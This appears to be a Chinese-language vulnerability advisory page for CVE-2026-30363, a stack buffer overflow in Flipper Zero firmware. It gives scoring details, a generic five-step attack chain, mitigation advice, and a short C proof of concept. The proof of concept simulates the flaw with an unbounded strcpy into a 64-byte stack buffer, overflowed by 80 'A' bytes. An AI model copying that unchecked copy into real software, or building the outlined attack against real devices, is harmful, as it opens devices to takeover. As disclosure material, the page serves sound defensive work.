CVE-2026-30363 CVSS 8.4 高危

CVE-2026-30363 Flipper Zero 固件栈溢出漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30363

漏洞类型

栈溢出

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Flipper Zero Firmware

漏洞概述

CVE-2026-30363 是 Flipper Zero 设备固件中发现的一个高危安全漏洞。该漏洞源于固件提交记录 ad2a80 中的“Main”函数存在严重的栈溢出缺陷。由于程序未能正确验证输入数据的长度，攻击者可以通过发送特制的数据流触发该溢出，进而导致程序崩溃或更严重的后果。鉴于 Flipper Zero 常用于安全测试，此漏洞一旦被利用，攻击者可获取设备控制权，对机密性、完整性和可用性造成严重影响。

技术细节

该漏洞位于 Flipper Zero 固件的特定版本（commit ad2a80）中，核心问题在于“Main”函数未对用户输入执行充分的边界检查。当程序处理超长输入时，会向栈上的缓冲区写入超出预设容量的数据，从而覆盖相邻的内存区域，包括返回地址。根据 CVSS 3.1 评分向量（AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H），攻击者无需用户交互或认证即可利用此漏洞。虽然攻击向量为本地，但物理接触或通过调试接口均可触发。通过精心构造的恶意载荷，攻击者能够控制指令指针，改写程序执行流。在成功利用后，攻击者不仅能导致设备拒绝服务，还可能以高权限在目标设备上执行任意代码，完全控制设备，造成极高的安全风险。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标设备是否运行包含 commit ad2a80 的 Flipper Zero 固件版本。

STEP 2

步骤2：载荷构造

攻击者编写一段超长的恶意数据流，包含旨在覆盖栈上返回地址的特定字节序列。

STEP 3

步骤3：投递载荷

通过本地接口（如 USB 或 NFC 交互）将恶意数据发送到设备的“Main”函数处理模块。

STEP 4

步骤4：触发溢出

由于缺乏边界检查，数据溢出缓冲区，覆盖返回地址，控制程序执行流。

STEP 5

步骤5：执行代码

程序跳转到攻击者控制的地址，执行任意代码，导致设备被完全控制或崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <string.h>

// Simulated vulnerable function in Flipper Zero Firmware (commit ad2a80)
void vulnerable_main_function(char* input) {
    char buffer[64]; // Stack buffer
    // Vulnerability: No bounds checking on strcpy
    strcpy(buffer, input); 
    printf("Input processed: %s\n", buffer);
}

int main() {
    // Crafting payload to overflow the buffer and overwrite return address
    // 'A' * 80 bytes to overflow the 64-byte buffer
    char payload[100];
    memset(payload, 0x41, 80); 
    payload[80] = '\0';

    printf("[+] Triggering CVE-2026-30363 PoC...\n");
    vulnerable_main_function(payload);
    
    return 0;
}

影响范围

flipperzero-firmware commit ad2a80

防御指南

临时缓解措施

如果无法立即升级固件，建议限制对设备的物理访问权限，并避免连接不可信的外设。开发者应临时修改代码逻辑，在“Main”函数入口处添加输入长度截断检查，确保输入数据不超过缓冲区大小。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表